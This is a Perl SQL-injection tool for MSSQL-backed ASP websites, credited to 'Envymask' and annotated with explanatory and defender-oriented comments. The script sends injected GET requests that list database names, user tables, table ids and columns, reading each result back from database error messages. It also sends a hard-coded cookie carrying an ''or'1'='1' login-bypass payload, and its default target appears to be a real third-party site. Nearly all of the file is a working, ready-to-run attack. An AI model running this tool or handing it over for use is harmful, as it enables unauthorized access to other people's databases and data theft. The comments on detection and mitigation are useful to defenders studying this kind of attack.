MSSQL Database Scanner for SQL Injection
#!/usr/bin/perl
# Command-line driver for an error-based MSSQL enumeration script.
# The file has neither `use strict` nor `use warnings`, so every unqualified
# variable set here ($host, $port, $path, $cookie, @sqldb, @table_name,
# @table_id, @columns, ...) is a package global shared with the subs below.
# Defender's note: every request sent by this script appends a query-string
# suffix of the form "%20and%200<>(select ... );--" to the normal URL and
# carries the fixed header in $cookie verbatim, so the traffic is simple to
# match in web-server logs or a WAF rule; the data it extracts only comes
# back if database error text is echoed to the client, so custom error pages
# and parameterised queries close the channel findstr() relies on.
$|=1;
use Socket;
use Getopt::Std;
# Getopt::Std: each of h p w t d i takes a value and lands in $opt_<letter>.
getopt('hpwtdi');
# Defaults are hard-coded; -t selects which branch below runs.
$host=$opt_h || "www.vod999.com";
$port=$opt_p || 80;
$path=$opt_w || "/movie_detail.asp?movie_m1id=1264";
$type=$opt_t || "table_scan";
$database=$opt_d;
$tab_id=$opt_i;
#############################################################
#this is debug flag;  (1 = findstr() dumps every raw response line)
$debug = 0;
#this is cookie info  (sent as-is as the last request header by make_request())
$cookie = "cookie: ASPSESSIONIDCASCBSBQ=JMOEIMPBLNBBGIPICGDIDECN; iscookies=0; BoardList=BoardID=Show; popped=yes; upNum=0; userinfo=bw%5Fu=1%27+or+%271%27%3D%271%27%3B%2D%2D; VisitNum=1";
#############################################################
# The banner/usage text is printed unconditionally, not only on bad input.
usage();
if($type eq "table_scan")
{
# scan_db() fills @sqldb; scan_table() then fills the parallel arrays
# @table_name and @table_id (one newline-joined string per database).
scan_db();
print "\nDatabase name scan complete!\n===================================\n";
foreach (@sqldb)
{
print "$_\n";
}
print "===================================\n";
scan_table(@sqldb);
for($i=0;$i<@sqldb;$i++)
{
print "\n\n============== $sqldb[$i] ==============\n\n";
# Split the accumulated "name\n" and "id\n" strings back into lists.
@tb=split(/\n/,$table_name[$i]);
@tbid=split(/\n/,$table_id[$i]);
for($j=0;$j<@tb;$j++)
{
print "| $tb[$j]($tbid[$j])\t";
}
}
}
# column_scan needs both -d and -i; with either missing nothing but the
# usage text is printed (no explicit error message).
elsif(($type eq "column_scan") && ($database ne "") && ($tab_id ne ""))
{
scan_columns($database,$tab_id);
print "\n============== $database.dbo.$tab_id ==============\n\n";
foreach (@columns)
{
print "| $_\t";
}
}
# sendraw($req): open a TCP connection to the global $host:$port, write the
# raw request string, read until the server closes the connection and return
# the response as a list of lines.  Dies if the host does not resolve, the
# socket cannot be created, or connect() fails.
# Notes: uses the bareword handle S (a global) and a hand-packed sockaddr_in
# ("SnA4x8" = family, port, address, padding) rather than Socket's
# sockaddr_in().  select(S)/$|=1 makes the request flush immediately; STDOUT
# is restored as the default output handle before returning.
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems\n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
# Slurps the whole response (headers and body) as lines.
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
# scan_db(): enumerate database names by dbid, starting at 7 (presumably to
# skip the system databases on a default install — not verified here), and
# append each name to the global @sqldb.  Stops at the first dbid for which
# findstr() reports "not found", so a gap in dbid numbering or a single
# non-matching response ends the scan early.
# Note: `my $req,$get;` declares only $req lexically; $get is a package
# global because the comma binds tighter than `my` here.
sub scan_db()
{
my $i=7;
my $req,$get;
my $db=1;
my @res;
while($db ne "not found")
{
$get=$path."%20and%200<>(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20name>1%20and%20dbid=$i);--";
$req=make_request($get);
@res=sendraw($req);
$db=findstr(@res);
if($db ne "not found")
{
@sqldb=(@sqldb,$db);
}
$i++;
}
}
# findstr(@lines): scan response lines for one matching /char.*int/i — from
# the context this is presumably the MSSQL type-conversion error text echoed
# into the page — and return the token between the first two single quotes
# on that line (spaces stripped).  Returns the literal string "not found"
# when no line matches or the quoted token is at most one character long;
# callers use that sentinel to end their loops.  Prints "." per candidate
# line as progress output; with $debug set every raw line is printed.
# Defender's note: this extraction only works when the raw database error
# reaches the HTTP client.
sub findstr
{
my @tmpres=@_;
my $tmpline;
# Only $s1 is lexical here; $s2 and $s3 are globals (comma vs `my`).
my $s1,$s2,$s3;
if($debug == 1)
{
print @tmpres;
}
foreach $tmpline (@tmpres)
{
if($tmpline=~/char.*int/isg)
{
$s1=0;
$s2=0;
$s3=0;
# Second field = text between the first and second apostrophes.
($s1,$s2,$s3)=split(/\'/,$tmpline);
$s2=~s/ //isg;
print ".";
if(length($s2) > 1)
{
return $s2;
}
}
}
return "not found";
}
# scan_table(@db_names): for each database, list user tables (sysobjects
# xtype='U') one at a time by excluding the names already seen via a growing
# `not in (...)` list, and for each table fetch its object id.  Results are
# accumulated into the globals @table_name[$i] and @table_id[$i] as
# newline-joined strings, indexed in the same order as @db_names.
# Notes: $db_name is a package global (no `my` in the foreach); `my $req,$get;`
# declares only $req.  The first table and its id are fetched before the
# loop and appended without checking for the "not found" sentinel, so an
# empty or non-responding database still yields one "not found" entry.
# The exclusion list also receives the final "not found" token on exit,
# which is harmless because the loop has already ended.
sub scan_table
{
my @db=@_;
my $req,$get;
my $table=1;
my @res;
my $tmpstr1;
my $i=0;
my $tableid;
foreach $db_name (@db)
{
$tmpstr1="";
$table=1;
# First user table of this database.
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U');--";
$req=make_request($get);
@res=sendraw($req);
$table=findstr(@res);
$table_name[$i]=$table_name[$i]."$table\n";
# Object id of that table, read back through the same error channel.
$get=$path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$table'%20and%20uid>(str(id)));--";
$req=make_request($get);
@res=sendraw($req);
$tableid=findstr(@res);
$table_id[$i]=$table_id[$i]."$tableid\n";
$tmpstr1="'$table'";
# Remaining tables: exclude everything collected so far.
while($table ne "not found")
{
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name%20not%20in($tmpstr1));--";
$req=make_request($get);
@res=sendraw($req);
$table=findstr(@res);
if($table ne "not found")
{
$table_name[$i]=$table_name[$i]."$table\n";
$get=$path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$table'%20and%20uid>(str(id)));--";
$req=make_request($get);
@res=sendraw($req);
$tableid=findstr(@res);
$table_id[$i]=$table_id[$i]."$tableid\n";
}
$tmpstr1=$tmpstr1.",'$table'";
}
print "\nDatabase \"$db_name\" scan complete!\n";
$i++;
}
}
# scan_columns($db_name, $table_id): list the column names of one table
# (syscolumns rows with the given object id) using the same
# one-at-a-time / `not in (...)` exclusion approach as scan_table(), and
# append them to the global @columns.
# Notes: $column is a package global; `my $get,$req,$tmpstr;` declares only
# $get.  The first result is pushed before the sentinel check, so a table
# with no readable columns still contributes one "not found" entry to
# @columns, which the caller then prints.
sub scan_columns
{
my $this_db_name=shift;
my $this_table_id=shift;
my $get,$req,$tmpstr;
my @res;
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id);--";
$req=make_request($get);
@res=sendraw($req);
$column=findstr(@res);
@columns=(@columns,$column);
$tmpstr="'$column'";
while($column ne "not found")
{
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id%20and%20name%20not%20in($tmpstr));--";
$req=make_request($get);
@res=sendraw($req);
$column=findstr(@res);
if($column ne "not found")
{
@columns=(@columns,$column);
$tmpstr=$tmpstr.",'$column'";
}
}
}
# make_request($url_path): build a raw HTTP/1.0 GET for the given path with a
# HOST header (taken from the global $host) and the fixed global $cookie line,
# terminated by the blank line that ends the header block.  No other headers
# (User-Agent, Connection) are sent, which is itself a distinguishing trait
# of this client in access logs.
sub make_request
{
my $getstr=shift;
my $reqstr;
$reqstr="GET $getstr HTTP/1.0\r\n".
"HOST:$host\r\n".
$cookie."\r\n\r\n";
return $reqstr;
}
# usage(): print the banner and option summary to STDOUT.  Called
# unconditionally at startup, so it appears before any scan output.  $0 is
# interpolated inside the qq~...~ string to show the script's own name.
sub usage
{
print qq~
===================================================
MSSQL Database Scanner for SQL Injection
Codz By Envymask
===================================================
Usage: $0 -h <Host> [-p <port>] -w <normal URL> -t <scan type> [-d <database name> -i <table id>]
-h =hostname you want to scan
-p =port,80 default
-w =the normal URL you request such as "/movie_detail.asp?movie_m1id=1264"
-t =scan type ,only accept "table_scan" and "column_scan"
-d =the database name you want to scan such as "movie",only selected "column_scan" can use this option
-i =the table id you want to scan such as "1568724641",you can get this id from table_scan,only selected "column_scan" can use this option
Eg: $0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t table_scan
$0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t column_scan -d movie -i 1568724641
~;
}